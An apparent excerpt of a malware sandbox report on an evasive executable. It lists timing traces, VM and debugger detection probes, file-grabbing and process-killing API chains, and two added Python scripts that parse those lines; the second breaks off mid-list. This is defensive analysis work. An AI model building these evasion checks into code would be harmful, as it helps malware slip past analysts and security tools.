Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1402C15 second address: 1402C3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007FAF1CCF5656h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FAF1CCF5666h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1403C5A second address: 1403C6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1403F2B second address: 1403F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1403F2F second address: 1403F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1406E00 second address: 1406E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140E75D second address: 140E77D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CBF1D51h 0x00000008 jmp 00007FAF1CBF1D4Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140E9F0 second address: 140E9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140E9F5 second address: 140EA08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007FAF1CBF1D46h 0x0000000d popad 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140EB4A second address: 140EB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAF1CCF5668h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FAF1CCF5668h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140ECA8 second address: 140ECAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140ECAC second address: 140ECBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FAF1CCF565Ah 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140EFD6 second address: 140EFDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140EFDD second address: 140EFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140EFE3 second address: 140F021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jno 00007FAF1CBF1D46h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007FAF1CBF1D53h 0x00000019 jmp 00007FAF1CBF1D54h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F15A second address: 140F15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F15F second address: 140F165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140F575 second address: 140F591 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF1CCF5664h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1412DDD second address: 1412DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14174BA second address: 14174BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14174BE second address: 14174C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14174C2 second address: 14174C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14174C8 second address: 14174CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D4FA2 second address: 13D500B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CCF565Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov ch, 89h 0x00000010 lea eax, dword ptr [ebp+1248AD74h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FAF1CCF5658h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 xor ecx, dword ptr [ebp+122D2764h] 0x00000036 nop 0x00000037 push ebx 0x00000038 jmp 00007FAF1CCF5666h 0x0000003d pop ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FAF1CCF565Ah 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D500B second address: 13D5027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D58h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14B04AA second address: 14B04B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14B04B4 second address: 14B04DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jg 00007FAF1CCF5658h 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007FAF1CCF5658h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14B33CC second address: 14B33E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FAF1CBF1D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push edi 0x0000000f jnl 00007FAF1CBF1D46h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14B4F2D second address: 14B4F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF1CCF5669h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14B4F4B second address: 14B4F55 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF1CBF1D4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E604DC second address: 4E604E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E604E1 second address: 4E604E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, C0h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E604E8 second address: 4E6050E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FAF1CCF5662h 0x0000000d push eax 0x0000000e pushad 0x0000000f mov edx, 6C5DF864h 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cx, dx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6050E second address: 4E6051C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6051C second address: 4E60520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E60520 second address: 4E60526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E60526 second address: 4E60576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FAF1CCF5667h 0x0000000b or si, BFDEh 0x00000010 jmp 00007FAF1CCF5669h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAF1CCF565Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E60576 second address: 4E60587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E60587 second address: 4E6058E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E6060A second address: 4E60642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAF1CBF1D53h 0x0000000a adc si, 301Eh 0x0000000f jmp 00007FAF1CBF1D59h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E60642 second address: 4E60648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E60648 second address: 4E6064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D06FB second address: 13D06FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 121D9CF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 121DAB4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13C726D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13C5B39 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13C5760 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13EB617 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 121D97E instructions caused by: Self-modifying code
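The interceptor lines above record each pair of back-to-back RDTSC reads the sandbox trapped, together with the instructions executed between them. The helper below is an added example, not part of the report or of Joe Sandbox: it parses those lines and derives two things the raw listing does not state, namely how many instructions separate the two reads (the window is only a handful of stack-neutral operations, so a large cycle delta means single-stepping, an RDTSC trap or an emulator) and how many bytes of the linear address range the trace never executed (taken branches stepping over junk bytes that a linear disassembler would decode). The sample lines are copied from the report; the "junk-only" classification is our own heuristic and an assumption, not something the sandbox outputs.

```python
import re
from dataclasses import dataclass

# Constructed input: three interceptor lines copied verbatim from the report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1476731 second address: 147673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 148C0A7 second address: 148C0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FAF1CCF5665h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF1CCF565Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14B04B4 second address: 14B04DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jg 00007FAF1CCF5658h 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007FAF1CCF5658h 0x00000022 rdtsc",
]

LINE_RE = re.compile(
    r"RDTSC instruction interceptor: First address: ([0-9A-Fa-f]+) "
    r"second address: ([0-9A-Fa-f]+) instructions: (.+)$"
)
STACK_OPS = {"push", "pop", "pushad", "popad", "pushfd", "popfd"}


@dataclass
class Insn:
    offset: int      # byte offset of the instruction inside the executed trace
    mnemonic: str
    operands: str


@dataclass
class RdtscPair:
    first: int       # address of the opening rdtsc
    second: int      # address of the rdtsc that closes the timing window
    insns: list      # executed trace; first and last entries are the two rdtsc

    @property
    def span_bytes(self):
        """Linear distance between the two reads."""
        return self.second - self.first

    @property
    def executed_bytes(self):
        """Bytes actually executed: offset of the closing rdtsc in the trace."""
        return self.insns[-1].offset

    @property
    def skipped_bytes(self):
        """Bytes inside the linear range the trace never executed, i.e. bytes a
        taken branch stepped over (junk a linear disassembler would decode)."""
        return self.span_bytes - self.executed_bytes

    def between(self):
        return self.insns[1:-1]

    def junk_only(self):
        """Our heuristic (assumption): the window holds only stack-neutral ops and
        branches, so nothing is computed between the reads; the pair exists only
        to measure how long a handful of instructions took to execute."""
        return all(i.mnemonic in STACK_OPS or i.mnemonic.startswith("j")
                   for i in self.between())


def parse_insns(text):
    """Split '0x00000002 pop edx 0x00000003 pop eax ...' into Insn records.
    Operands in these listings never start with '0x', so an 8-hex-digit '0x'
    token preceded by whitespace always starts a new instruction."""
    out = []
    for chunk in re.split(r"\s+(?=0x[0-9A-Fa-f]{8}\s)", text.strip()):
        off, _, rest = chunk.partition(" ")
        mnemonic, _, operands = rest.partition(" ")
        out.append(Insn(int(off, 16), mnemonic, operands))
    return out


def parse_rdtsc_line(line):
    m = LINE_RE.search(line)
    if not m:
        return None
    insns = parse_insns(m.group(3))
    if len(insns) < 2 or insns[0].mnemonic != "rdtsc" or insns[-1].mnemonic != "rdtsc":
        return None
    return RdtscPair(int(m.group(1), 16), int(m.group(2), 16), insns)


def summarize(lines):
    """Aggregate view an analyst wants when a report lists dozens of pairs."""
    pairs = [p for p in map(parse_rdtsc_line, lines) if p]
    return {
        "pairs": len(pairs),
        "junk_only": sum(p.junk_only() for p in pairs),
        "max_between": max((len(p.between()) for p in pairs), default=0),
        "with_skipped_bytes": sum(p.skipped_bytes > 0 for p in pairs),
    }


if __name__ == "__main__":
    for p in map(parse_rdtsc_line, SAMPLE_LINES):
        print(f"{p.first:07X}->{p.second:07X} between={len(p.between()):2d} "
              f"span={p.span_bytes:2d} skipped={p.skipped_bytes:2d} junk_only={p.junk_only()}")
    print(summarize(SAMPLE_LINES))
```

Where span_bytes equals executed_bytes the code between the reads is straight-line; where it is larger, one of the conditional jumps in the window was taken and the bytes it skipped are never executed, which is why static disassembly of these regions looks like garbage while the sandbox trace stays short.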
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00F440F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00F3E530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00F447C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F3F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F31710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F3DB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F44B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00F43B00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00F3BE40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00F3EE20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F3DF10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F31160 GetSystemInfo,ExitProcess, 0_2_00F31160
Source: file.exe, file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2113114519.00000000009F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareV9
Source: file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (6 occurrences)
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort (3 occurrences)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F34610 VirtualProtect ?,00000004,00000100,00000000 0_2_00F34610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00F49BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49AA0 mov eax, dword ptr fs:[00000030h] 0_2_00F49AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F47690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA, 0_2_00F47690
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 3628, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00F49790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F498E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle, 0_2_00F498E0
Source: file.exe, file.exe, 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F775A8 cpuid 0_2_00F775A8
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00F47D20
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F46BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00F46BC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F479E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00F479E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F47BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00F47BC0
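The "Code function" lines in this section and in the sections above are raw API-call chains, and the anti-debugging lines are single probes: window class names of the Sysinternals monitors and OllyDbg, the SoftICE device names NTICE, SICE and SIWVID, the DebugPort and HideFromDebugger queries, and the BIOS and display-adapter registry values. The script below is an added example, not part of the report or of Joe Sandbox: it parses those line formats and maps each to a technique label, so that the FindFirstFile/CopyFile grabbing loops, the Toolhelp32 process search and kill, the keyboard-layout check and the date-gated ExitProcess chain stand out without reading every chain by hand. The sample lines are copied from the report with the sandbox's "Jump to behavior" link text removed; the technique labels, the ordered-subsequence patterns and the 8x GetProcAddress threshold are our own assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed input: behaviour lines copied from the report, "Jump to behavior" stripped.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00F3F7B0",
    r"Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg",
    r"Source: C:\Users\user\Desktop\file.exe File opened: SICE",
    r"Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort",
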